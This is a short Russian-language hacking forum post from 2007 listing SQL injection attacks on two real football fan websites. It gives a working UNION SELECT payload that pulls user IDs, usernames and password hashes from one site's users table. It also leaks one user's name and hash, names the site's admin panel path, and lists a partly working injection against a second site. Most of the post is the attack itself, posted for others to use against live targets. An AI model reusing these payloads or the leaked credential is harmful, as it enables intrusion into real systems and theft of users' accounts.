05.05.2007, 00:28
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-inj
Футбол.
Сайт: www.liverpoolfc.ru
уязвимость: http://www.liverpoolfc.ru/news.php?id=1673'
подобранные таблицы: users
подобранные поля: user_name,user_pass,user_id
1: Jari:034054de62d75ca7
http://www.liverpoolfc.ru/news.php?id=-1673+union+select+1,2,concat_ws(0x3a,user_id,user_ name,user_pass),4,5,6+from+users/*
админка
http://www.liverpoolfc.ru/_redadmin/
Не окончено:
http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом
|
|
|